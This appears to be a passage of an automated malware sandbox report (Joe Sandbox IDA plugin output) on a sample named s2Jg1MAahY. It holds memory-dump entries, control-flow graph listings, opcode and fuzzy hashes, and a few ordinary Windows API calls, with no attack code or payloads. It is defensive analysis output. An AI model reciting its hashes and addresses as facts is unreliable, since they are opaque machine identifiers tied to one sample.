                                                                                                                    • Instruction Fuzzy Hash: 5C027D30B00216DFDB54DB68D8946AEB7E6FF88304F148569D41ADB398DB35EC82CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 0-3993045852
                                                                                                                    • Opcode ID: 43ed4e8b213875aedf00e5ccd31959060a7a8f69c819d1ce4f1ea208dde364eb
                                                                                                                    • Instruction ID: 463a6d033e6e7d90ffde08e1616866108d3e1e53ef32ee119a26baf3e88d8a98
                                                                                                                    • Opcode Fuzzy Hash: 43ed4e8b213875aedf00e5ccd31959060a7a8f69c819d1ce4f1ea208dde364eb
                                                                                                                    • Instruction Fuzzy Hash: 1A22CF35F00215CFDF65DFA4E4846EEBBB2EB85310F20856AD44AAB348DA35DC42CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aa48647c82c2a5a9afe4183f312640534cfd4e69489a2f2ddc7eb685dc0966c3
                                                                                                                    • Instruction ID: 6f729c69b1a1d5046359b1fa1b01693ac659cc5c9e49bde20c12529ae001a51c
                                                                                                                    • Opcode Fuzzy Hash: aa48647c82c2a5a9afe4183f312640534cfd4e69489a2f2ddc7eb685dc0966c3
                                                                                                                    • Instruction Fuzzy Hash: 97A22534A00208CFDB64CB68C584BADB7F2FB49314F5594A9D44AAB369DB35ED81CF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 61e88d93ce13f6ae89ecb401097a2ec3a8d71ea706d29ec9ef01dcafef1fb66a
                                                                                                                    • Instruction ID: bb9dfd57a79ac5beecdd4e4fef98f06b7ff960460e01ffe45b4e60913340bf58
                                                                                                                    • Opcode Fuzzy Hash: 61e88d93ce13f6ae89ecb401097a2ec3a8d71ea706d29ec9ef01dcafef1fb66a
                                                                                                                    • Instruction Fuzzy Hash: 51629D34B00215CFDB54DB68D594AAEB7F2EF88314F149469E40AEB398DB35EC42CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 6dbade0-6dbadfe 1 6dbae00-6dbae03 0->1 2 6dbae26-6dbae29 1->2 3 6dbae05-6dbae21 1->3 4 6dbae2f-6dbae32 2->4 5 6dbaffd-6dbb006 2->5 3->2 9 6dbae46-6dbae49 4->9 10 6dbae34-6dbae41 4->10 6 6dbae89-6dbae92 5->6 7 6dbb00c-6dbb016 5->7 13 6dbae98-6dbae9c 6->13 14 6dbb017-6dbb04e 6->14 11 6dbae4b-6dbae4f 9->11 12 6dbae5a-6dbae5d 9->12 10->9 11->7 15 6dbae55 11->15 16 6dbae5f-6dbae64 12->16 17 6dbae67-6dbae6a 12->17 19 6dbaea1-6dbaea4 13->19 26 6dbb050-6dbb053 14->26 15->12 16->17 21 6dbae6c-6dbae7f 17->21 22 6dbae84-6dbae87 17->22 24 6dbaea6-6dbaeaf 19->24 25 6dbaeb4-6dbaeb6 19->25 21->22 22->6 22->19 24->25 27 6dbaeb8 25->27 28 6dbaebd-6dbaec0 25->28 31 6dbb076-6dbb079 26->31 32 6dbb055-6dbb071 26->32 27->28 28->1 29 6dbaec6-6dbaeea 28->29 49 6dbaffa 29->49 50 6dbaef0-6dbaeff 29->50 33 6dbb07b call 6dbb3df 31->33 34 6dbb088-6dbb08b 31->34 32->31 39 6dbb081-6dbb083 33->39 36 6dbb098-6dbb09b 34->36 37 6dbb08d-6dbb091 34->37 41 6dbb0a1-6dbb0dc 36->41 42 6dbb304-6dbb307 36->42 40 6dbb093 37->40 37->41 39->34 40->36 53 6dbb2cf-6dbb2e2 41->53 54 6dbb0e2-6dbb0ee 41->54 44 6dbb309-6dbb313 42->44 45 6dbb314-6dbb316 42->45 47 6dbb318 45->47 48 6dbb31d-6dbb320 45->48 47->48 48->26 52 6dbb326-6dbb330 48->52 49->5 57 6dbaf01-6dbaf07 50->57 58 6dbaf17-6dbaf52 call 6db66b0 50->58 56 6dbb2e4 53->56 62 6dbb10e-6dbb152 54->62 63 6dbb0f0-6dbb109 54->63 56->42 60 6dbaf0b-6dbaf0d 57->60 61 6dbaf09 57->61 74 6dbaf6a-6dbaf81 58->74 75 6dbaf54-6dbaf5a 58->75 60->58 61->58 79 6dbb16e-6dbb1ad 62->79 80 6dbb154-6dbb166 62->80 63->56 88 6dbaf99-6dbafaa 74->88 89 6dbaf83-6dbaf89 74->89 77 6dbaf5e-6dbaf60 75->77 78 6dbaf5c 75->78 77->74 78->74 84 6dbb1b3-6dbb28e call 6db66b0 79->84 85 6dbb294-6dbb2a9 79->85 80->79 84->85 85->53 96 6dbafac-6dbafb2 88->96 97 6dbafc2-6dbaff3 88->97 92 6dbaf8b 89->92 93 6dbaf8d-6dbaf8f 89->93 92->88 93->88 99 6dbafb6-6dbafb8 96->99 100 6dbafb4 96->100 97->49 99->97 100->97
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: 6be29144996874630792b6d804656b30ae3d4db2b02f2ed373760d6c58d67c89
                                                                                                                    • Instruction ID: 8407f6fb5356386c79c3fd6b564611b198a6288bfe8d3c4c57c79d1a58eafc3c
                                                                                                                    • Opcode Fuzzy Hash: 6be29144996874630792b6d804656b30ae3d4db2b02f2ed373760d6c58d67c89
                                                                                                                    • Instruction Fuzzy Hash: 62E16F70F10219CBCB65DF69D4846AEB7F2FB89301F14892AE40ADB348DB74D8468B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 255 6da9c81-6da9c88 256 6da9c8a-6da9c90 255->256 257 6da9c91-6da9d1f GetCurrentProcess 255->257 256->257 262 6da9d28-6da9d5c GetCurrentThread 257->262 263 6da9d21-6da9d27 257->263 264 6da9d5e-6da9d64 262->264 265 6da9d65-6da9d99 GetCurrentProcess 262->265 263->262 264->265 267 6da9d9b-6da9da1 265->267 268 6da9da2-6da9dbd call 6da9e60 265->268 267->268 271 6da9dc3-6da9df2 GetCurrentThreadId 268->271 272 6da9dfb-6da9e5d 271->272 273 6da9df4-6da9dfa 271->273 273->272
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06DA9D0E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06DA9D4B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06DA9D88
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 06DA9DE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: 628bbdb455458e9698f121b1e7515b337b0cd48b89c24d0ec1891426f6d30e5a
                                                                                                                    • Instruction ID: fa1ef92967c58390d2ee9feb5490afa16e5375e06194b6206214f32ad07d628c
                                                                                                                    • Opcode Fuzzy Hash: 628bbdb455458e9698f121b1e7515b337b0cd48b89c24d0ec1891426f6d30e5a
                                                                                                                    • Instruction Fuzzy Hash: 155176B09103498FDB54DFAAD948B9EBFF1EF88311F248459E409AB360D7345984CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 280 6da9c90-6da9d1f GetCurrentProcess 285 6da9d28-6da9d5c GetCurrentThread 280->285 286 6da9d21-6da9d27 280->286 287 6da9d5e-6da9d64 285->287 288 6da9d65-6da9d99 GetCurrentProcess 285->288 286->285 287->288 290 6da9d9b-6da9da1 288->290 291 6da9da2-6da9dbd call 6da9e60 288->291 290->291 294 6da9dc3-6da9df2 GetCurrentThreadId 291->294 295 6da9dfb-6da9e5d 294->295 296 6da9df4-6da9dfa 294->296 296->295
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06DA9D0E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06DA9D4B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06DA9D88
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 06DA9DE1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: 1c698a747e03080a5ad30add54b50d702fb5f04cd4e3c23b3e07c20515c18e42
                                                                                                                    • Instruction ID: d6c06116dd8f0d4aaf97f93d1253337872a27201b487a733a2a650e14a54e544
                                                                                                                    • Opcode Fuzzy Hash: 1c698a747e03080a5ad30add54b50d702fb5f04cd4e3c23b3e07c20515c18e42
                                                                                                                    • Instruction Fuzzy Hash: 2B5157B09103498FDB54DFAAD948B9EBFF1EF88314F248459E409AB360DB345984CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 303 6db9260-6db9285 304 6db9287-6db928a 303->304 305 6db928c-6db92ab 304->305 306 6db92b0-6db92b3 304->306 305->306 307 6db92b9-6db92ce 306->307 308 6db9b73-6db9b75 306->308 315 6db92d0-6db92d6 307->315 316 6db92e6-6db92fc 307->316 310 6db9b7c-6db9b7f 308->310 311 6db9b77 308->311 310->304 312 6db9b85-6db9b8f 310->312 311->310 317 6db92da-6db92dc 315->317 318 6db92d8 315->318 320 6db9307-6db9309 316->320 317->316 318->316 321 6db930b-6db9311 320->321 322 6db9321-6db9392 320->322 323 6db9313 321->323 324 6db9315-6db9317 321->324 333 6db93be-6db93da 322->333 334 6db9394-6db93b7 322->334 323->322 324->322 339 6db93dc-6db93ff 333->339 340 6db9406-6db9421 333->340 334->333 339->340 345 6db944c-6db9467 340->345 346 6db9423-6db9445 340->346 351 6db9469-6db948b 345->351 352 6db9492-6db949c 345->352 346->345 351->352 353 6db949e-6db94a7 352->353 354 6db94ac-6db9526 352->354 353->312 360 6db9528-6db9546 354->360 361 6db9573-6db9588 354->361 365 6db9548-6db9557 360->365 366 6db9562-6db9571 360->366 361->308 365->366 366->360 366->361
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 30967061e1088c8c4d1046d85dff7ea7d88079c90654a4818049304013737301
                                                                                                                    • Instruction ID: 72943468943561e115ece745ece5071cbc999e0f7d77165415b68ac47a83a1e3
                                                                                                                    • Opcode Fuzzy Hash: 30967061e1088c8c4d1046d85dff7ea7d88079c90654a4818049304013737301
                                                                                                                    • Instruction Fuzzy Hash: CE914030B0021A9FDB54DB69D8607AEB7F6EBC9304F108569C50EEB348EA74DC42CB95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 369 6dbd068-6dbd083 370 6dbd085-6dbd088 369->370 371 6dbd08a-6dbd099 370->371 372 6dbd0d1-6dbd0d4 370->372 375 6dbd09b-6dbd0a0 371->375 376 6dbd0a8-6dbd0b4 371->376 373 6dbd11d-6dbd120 372->373 374 6dbd0d6-6dbd118 372->374 377 6dbd12f-6dbd132 373->377 378 6dbd122-6dbd124 373->378 374->373 375->376 379 6dbd0ba-6dbd0cc 376->379 380 6dbda85-6dbdabe 376->380 383 6dbd13c-6dbd13f 377->383 384 6dbd134-6dbd139 377->384 381 6dbd12a 378->381 382 6dbd551 378->382 379->372 395 6dbdac0-6dbdac3 380->395 381->377 389 6dbd554-6dbd560 382->389 387 6dbd188-6dbd18b 383->387 388 6dbd141-6dbd183 383->388 384->383 391 6dbd18d-6dbd1cf 387->391 392 6dbd1d4-6dbd1d7 387->392 388->387 389->371 394 6dbd566-6dbd853 389->394 391->392 397 6dbd1d9-6dbd21b 392->397 398 6dbd220-6dbd223 392->398 582 6dbda7a-6dbda84 394->582 583 6dbd859-6dbd85f 394->583 399 6dbdae6-6dbdae9 395->399 400 6dbdac5-6dbdae1 395->400 397->398 404 6dbd26c-6dbd26f 398->404 405 6dbd225-6dbd267 398->405 402 6dbdaeb-6dbdb17 399->402 403 6dbdb1c-6dbdb1f 399->403 400->399 402->403 411 6dbdb2e-6dbdb30 403->411 412 6dbdb21 call 6dbdbdd 403->412 409 6dbd2b8-6dbd2bb 404->409 410 6dbd271-6dbd280 404->410 405->404 423 6dbd2ca-6dbd2cd 409->423 424 6dbd2bd-6dbd2bf 409->424 417 6dbd28f-6dbd29b 410->417 418 6dbd282-6dbd287 410->418 420 6dbdb32 411->420 421 6dbdb37-6dbdb3a 411->421 427 6dbdb27-6dbdb29 412->427 417->380 430 6dbd2a1-6dbd2b3 417->430 418->417 420->421 421->395 429 6dbdb3c-6dbdb4b 421->429 433 6dbd2ea-6dbd2ed 423->433 434 6dbd2cf-6dbd2e5 423->434 431 6dbd40f-6dbd418 424->431 432 6dbd2c5 424->432 427->411 455 6dbdb4d-6dbdbb0 call 6db66b0 429->455 456 6dbdbb2-6dbdbc7 429->456 430->409 439 6dbd41a-6dbd41f 431->439 440 6dbd427-6dbd433 431->440 432->423 436 6dbd2ef-6dbd331 433->436 437 6dbd336-6dbd339 433->437 434->433 436->437 447 6dbd33b-6dbd357 437->447 448 6dbd35c-6dbd35f 437->448 439->440 449 6dbd439-6dbd44d 440->449 450 6dbd544-6dbd549 440->450 447->448 448->389 457 6dbd365-6dbd368 448->457 449->382 474 6dbd453-6dbd465 449->474 450->382 455->456 476 6dbdbc8 456->476 464 6dbd36a-6dbd3ac 457->464 465 6dbd3b1-6dbd3b4 457->465 464->465 468 6dbd3fd-6dbd3ff 465->468 469 6dbd3b6-6dbd3f8 465->469 478 6dbd401 468->478 479 6dbd406-6dbd409 468->479 469->468 490 6dbd489-6dbd48b 474->490 491 6dbd467-6dbd46d 474->491 476->476 478->479 479->370 479->431 492 6dbd495-6dbd4a1 490->492 497 6dbd46f 491->497 498 6dbd471-6dbd47d 491->498 509 6dbd4af 492->509 510 6dbd4a3-6dbd4ad 492->510 500 6dbd47f-6dbd487 497->500 498->500 500->492 511 6dbd4b4-6dbd4b6 509->511 510->511 511->382 516 6dbd4bc-6dbd4d8 call 6db66b0 511->516 526 6dbd4da-6dbd4df 516->526 527 6dbd4e7-6dbd4f3 516->527 526->527 527->450 529 6dbd4f5-6dbd542 527->529 529->382 584 6dbd86e-6dbd877 583->584 585 6dbd861-6dbd866 583->585 584->380 586 6dbd87d-6dbd890 584->586 585->584 588 6dbda6a-6dbda74 586->588 589 6dbd896-6dbd89c 586->589 588->582 588->583 590 6dbd8ab-6dbd8b4 589->590 591 6dbd89e-6dbd8a3 589->591 590->380 592 6dbd8ba-6dbd8db 590->592 591->590 595 6dbd8ea-6dbd8f3 592->595 596 6dbd8dd-6dbd8e2 592->596 595->380 597 6dbd8f9-6dbd916 595->597 596->595 597->588 600 6dbd91c-6dbd922 597->600 600->380 601 6dbd928-6dbd941 600->601 603 6dbda5d-6dbda64 601->603 604 6dbd947-6dbd96e 601->604 603->588 603->600 604->380 607 6dbd974-6dbd97e 604->607 607->380 608 6dbd984-6dbd99b 607->608 610 6dbd9aa-6dbd9c5 608->610 611 6dbd99d-6dbd9a8 608->611 610->603 616 6dbd9cb-6dbd9e4 call 6db66b0 610->616 611->610 620 6dbd9f3-6dbd9fc 616->620 621 6dbd9e6-6dbd9eb 616->621 620->380 622 6dbda02-6dbda56 620->622 621->620 622->603
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                    • API String ID: 0-831282457
                                                                                                                    • Opcode ID: 286fc76f7f9d1a496d4a50665e4ca3882c519c38df90fae5b21b22005c84b13a
                                                                                                                    • Instruction ID: 6bd8f51699fb081d0b8a6343191c64e4f9adf231392c5239795646d7c2362496
                                                                                                                    • Opcode Fuzzy Hash: 286fc76f7f9d1a496d4a50665e4ca3882c519c38df90fae5b21b22005c84b13a
                                                                                                                    • Instruction Fuzzy Hash: DC624C70B00316CFCB15DB68E584A9DBBF2FF84305B249969D40A9F258DB75EC86CB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 630 6db4c78-6db4c9c 631 6db4c9e-6db4ca1 630->631 632 6db4ca3-6db4cbd 631->632 633 6db4cc2-6db4cc5 631->633 632->633 634 6db4ccb-6db4dc3 633->634 635 6db53a4-6db53a6 633->635 653 6db4dc9-6db4e16 call 6db5521 634->653 654 6db4e46-6db4e4d 634->654 637 6db53a8 635->637 638 6db53ad-6db53b0 635->638 637->638 638->631 639 6db53b6-6db53c3 638->639 667 6db4e1c-6db4e38 653->667 655 6db4e53-6db4ec3 654->655 656 6db4ed1-6db4eda 654->656 673 6db4ece 655->673 674 6db4ec5 655->674 656->639 670 6db4e3a 667->670 671 6db4e43 667->671 670->671 671->654 673->656 674->673
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq$\Ocq
                                                                                                                    • API String ID: 0-3575482020
                                                                                                                    • Opcode ID: 8ec4d1ea2329bbae5525e88cdfc07bccb6f59eab8b34976668c1038ece91523c
                                                                                                                    • Instruction ID: 26f8b66d941f91dcbcaf337975ec1e97ae9752bef2dbdf9959c86b780f98d14b
                                                                                                                    • Opcode Fuzzy Hash: 8ec4d1ea2329bbae5525e88cdfc07bccb6f59eab8b34976668c1038ece91523c
                                                                                                                    • Instruction Fuzzy Hash: B1619230F002199FEB55DFA9C4547AEBBF6FB88700F20842AD106EB399DB758C458B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1069 6db9253-6db925a 1070 6db925b-6db925c 1069->1070 1070->1070 1071 6db925e-6db9285 1070->1071 1073 6db9287-6db928a 1071->1073 1074 6db928c-6db92ab 1073->1074 1075 6db92b0-6db92b3 1073->1075 1074->1075 1076 6db92b9-6db92ce 1075->1076 1077 6db9b73-6db9b75 1075->1077 1084 6db92d0-6db92d6 1076->1084 1085 6db92e6-6db92fc 1076->1085 1079 6db9b7c-6db9b7f 1077->1079 1080 6db9b77 1077->1080 1079->1073 1081 6db9b85-6db9b8f 1079->1081 1080->1079 1086 6db92da-6db92dc 1084->1086 1087 6db92d8 1084->1087 1089 6db9307-6db9309 1085->1089 1086->1085 1087->1085 1090 6db930b-6db9311 1089->1090 1091 6db9321-6db9392 1089->1091 1092 6db9313 1090->1092 1093 6db9315-6db9317 1090->1093 1102 6db93be-6db93da 1091->1102 1103 6db9394-6db93b7 1091->1103 1092->1091 1093->1091 1108 6db93dc-6db93ff 1102->1108 1109 6db9406-6db9421 1102->1109 1103->1102 1108->1109 1114 6db944c-6db9467 1109->1114 1115 6db9423-6db9445 1109->1115 1120 6db9469-6db948b 1114->1120 1121 6db9492-6db949c 1114->1121 1115->1114 1120->1121 1122 6db949e-6db94a7 1121->1122 1123 6db94ac-6db9526 1121->1123 1122->1081 1129 6db9528-6db9546 1123->1129 1130 6db9573-6db9588 1123->1130 1134 6db9548-6db9557 1129->1134 1135 6db9562-6db9571 1129->1135 1130->1077 1134->1135 1135->1129 1135->1130
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 40475b9d471257956ff338ccce29dc7f742cbd8b3f03333ce12ae0fbd60cf8ea
                                                                                                                    • Instruction ID: d9324e5b0928aa15566b08197e125ae21bf9a8eb3621c90cb6a80ff0f7b38cb6
                                                                                                                    • Opcode Fuzzy Hash: 40475b9d471257956ff338ccce29dc7f742cbd8b3f03333ce12ae0fbd60cf8ea
                                                                                                                    • Instruction Fuzzy Hash: 69518230B002059FDB54DB79E9A0BAEB3F6EBC9714F108569C50ADB348EA74DC42CB95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1138 6db4c69-6db4c9c 1140 6db4c9e-6db4ca1 1138->1140 1141 6db4ca3-6db4cbd 1140->1141 1142 6db4cc2-6db4cc5 1140->1142 1141->1142 1143 6db4ccb-6db4dc3 1142->1143 1144 6db53a4-6db53a6 1142->1144 1162 6db4dc9-6db4e16 call 6db5521 1143->1162 1163 6db4e46-6db4e4d 1143->1163 1146 6db53a8 1144->1146 1147 6db53ad-6db53b0 1144->1147 1146->1147 1147->1140 1148 6db53b6-6db53c3 1147->1148 1176 6db4e1c-6db4e38 1162->1176 1164 6db4e53-6db4ec3 1163->1164 1165 6db4ed1-6db4eda 1163->1165 1182 6db4ece 1164->1182 1183 6db4ec5 1164->1183 1165->1148 1179 6db4e3a 1176->1179 1180 6db4e43 1176->1180 1179->1180 1180->1163 1182->1165 1183->1182
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3023265501.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6db0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq
                                                                                                                    • API String ID: 0-936005338
                                                                                                                    • Opcode ID: aa8c6efcd8a65079bc0497ceed5340ca8411addea3a3c568cf37dbc0a849276e
                                                                                                                    • Instruction ID: 2afa1dc344c65f06a72ad1bd29ff3a0a68548bec4a226ef3146c0f937304e92b
                                                                                                                    • Opcode Fuzzy Hash: aa8c6efcd8a65079bc0497ceed5340ca8411addea3a3c568cf37dbc0a849276e
                                                                                                                    • Instruction Fuzzy Hash: 36517170B002099FDB55DFA9C8547AEBBF7FF88700F20852AD145EB395DA758C058B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.2974653019.00000000018E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_18e0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 98d83f790620b007d6ecdd03ce59f437aa185cc16ac374c47b362b35bba2b661
                                                                                                                    • Instruction ID: 76ba86601de8831930643fbe3607ea0da85d7b0633791619288dae88135fee77
                                                                                                                    • Opcode Fuzzy Hash: 98d83f790620b007d6ecdd03ce59f437aa185cc16ac374c47b362b35bba2b661
                                                                                                                    • Instruction Fuzzy Hash: 3D414472E043968FCB14CF79D80429ABFF0AF8A310F1585AAE548E7241DB349945CBD1
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DA60EA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 9c22b66200edcd902aff5cb680e143931f3ac4cd6e472d7644aef9a14126eb8e
                                                                                                                    • Instruction ID: e0dc284db488dedc6ceb1362c6dad62fd83051c0ea8b74ddde9ffeaa80dbe1c8
                                                                                                                    • Opcode Fuzzy Hash: 9c22b66200edcd902aff5cb680e143931f3ac4cd6e472d7644aef9a14126eb8e
                                                                                                                    • Instruction Fuzzy Hash: 5451AEB1D10349EFDB14CF9AC884ADEBBB5FF48310F24812AE419AB210D7759985CF95
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06DA60EA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 52236cf3621ddb5f6d9aff35a24d3ada64c43d682c2adb99c8e7be0bd9341b8c
                                                                                                                    • Instruction ID: 4eb12a9db5a747b4e4f9cdd362a63533a62299ec5b5034a62cb8b5f43bfe05f2
                                                                                                                    • Opcode Fuzzy Hash: 52236cf3621ddb5f6d9aff35a24d3ada64c43d682c2adb99c8e7be0bd9341b8c
                                                                                                                    • Instruction Fuzzy Hash: B441AEB1D10349EFDB14CFAAC884ADEBBB5BF48310F24812AE419AB210D7759985CF95
                                                                                                                    APIs
                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06DAAE29
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6da0000_s2Jg1MAahY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallProcWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714655100-0
                                                                                                                    • Opcode ID: 0deaeca761fbf6f46a8d426e2a5be4f98183a0f4197377f811f5b74b1a391bad
                                                                                                                    • Instruction ID: a9ea91eb14c253764648b06a5a79eafb0a2660ea385e79de427ebd5ac42650ea
                                                                                                                    • Opcode Fuzzy Hash: 0deaeca761fbf6f46a8d426e2a5be4f98183a0f4197377f811f5b74b1a391bad
                                                                                                                    • Instruction Fuzzy Hash: F5415AB4A10349CFCB54CF89C888AAABBF5FF88314F28C559D519A7321D730A940CFA0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.3022901948.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
